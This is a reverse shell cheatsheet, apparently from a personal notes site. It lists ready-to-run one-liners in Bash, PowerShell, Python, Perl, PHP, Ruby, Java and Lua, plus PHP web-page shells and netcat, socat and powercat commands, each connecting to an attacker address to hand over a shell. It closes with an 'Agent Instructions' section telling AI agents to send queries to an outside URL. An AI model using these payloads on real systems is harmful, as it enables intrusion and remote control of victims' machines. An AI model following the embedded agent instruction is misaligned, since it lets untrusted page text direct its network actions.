# Reverse Shell Cheatsheet

**Bash**

```bash
bash -i >& /dev/tcp/10.0.0.10/666 0>&1
```

*or*

```bash
0<&196;exec 196<>/dev/tcp/10.0.0.10/666; sh <&196 >&196 2>&196
```

*or*

```bash
bash -c 'bash -i >& /dev/tcp/10.0.0.10/666 0>&1'
```

**PowerShell**

```powershell
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.10',666);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -Name System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
```

**Python for Linux**

```python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.10",666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```

*or*

```python
__import__("os").system("bash -c 'bash -i >& /dev/tcp/10.0.0.10/666 0>&1'")
```

**Python for Windows**

```
exec("""import os, socket, subprocess, threading, sys\ndef s2p(s, p):\n    while True:p.stdin.write(s.recv(1024).decode()); p.stdin.flush()\ndef p2s(s, p):\n    while True: s.send(p.stdout.read(1).encode())\ns=socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nwhile True:\n    try: s.connect(("10.0.0.10",666)); break\n    except: pass\np=subprocess.Popen(["powershell.exe"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE, shell=True, text=True)\nthreading.Thread(target=s2p, args=[s,p], daemon=True).start()\nthreading.Thread(target=p2s, args=[s,p], daemon=True).start()\ntry: p.wait()\nexcept: s.close(); sys.exit(0)""")
```

*or*

```
python -c 'exec("""import os, socket, subprocess, threading, sys\ndef s2p(s, p):\n    while True:p.stdin.write(s.recv(1024).decode()); p.stdin.flush()\ndef p2s(s, p):\n    while True: s.send(p.stdout.read(1).encode())\ns=socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nwhile True:\n    try: s.connect(("10.0.0.10",666)); break\n    except: pass\np=subprocess.Popen(["powershell.exe"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE, shell=True, text=True)\nthreading.Thread(target=s2p, args=[s,p], daemon=True).start()\nthreading.Thread(target=p2s, args=[s,p], daemon=True).start()\ntry: p.wait()\nexcept: s.close(); sys.exit(0)""")
```

**Perl**

```
perl -e 'use Socket;$i="10.0.0.10";$p=666;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
```

**PHP**

```
php -r '$sock=fsockopen("10.0.0.10",666);exec("/bin/sh -i <&3 >&3 2>&3");'
```

**Ruby**

```
ruby -rsocket -e'f=TCPSocket.open("10.0.0.10",666).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
```

**Java**

```
r = Runtime.getRuntime(); p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.10/666;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]); p.waitFor();
```

**Lua**

```
lua -e "local s=require('socket');local t=assert(s.tcp());t:connect('10.0.0.10',666);while true do local r,x=t:receive();local f=assert(io.popen(r,'r'));local b=assert(f:read('*a'));t:send(b);end;f:close();t:close();" 
```

**Telnet**

```
telnet localhost 443 | /bin/sh | telnet localhost 444
```

**Xterm**

```
xterm -display 10.0.0.10:1
```

***

### PHP Web Pages <a href="#php-web-pages" id="php-web-pages"></a>

**Linux**

```
<?php echo shell_exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/666 0>&1'")?>
```

**Windows**

```
<?php echo shell_exec("powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.10',666);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -Name System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"")?>
```

***

### Tools <a href="#tools" id="tools"></a>

**Netcat**

```
nc -e /bin/sh 10.0.0.10 666
```

**Netcat without -e**

```
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.0.0.10 666 > /tmp/f
```

**Socat**

```
user@ubuntu:~$ socat - TCP4:10.0.0.10:666 EXEC:'/bin/bash -li'
C:\> socat TCP4:10.0.0.10:666 EXEC:'cmd.exe'
```

**Powercat**

```
powercat -c 10.0.0.10 -p 666 -e cmd.exe
```

<br>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://notes.anggipradana.com/tutorial/reverse-shell-cheatsheet.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.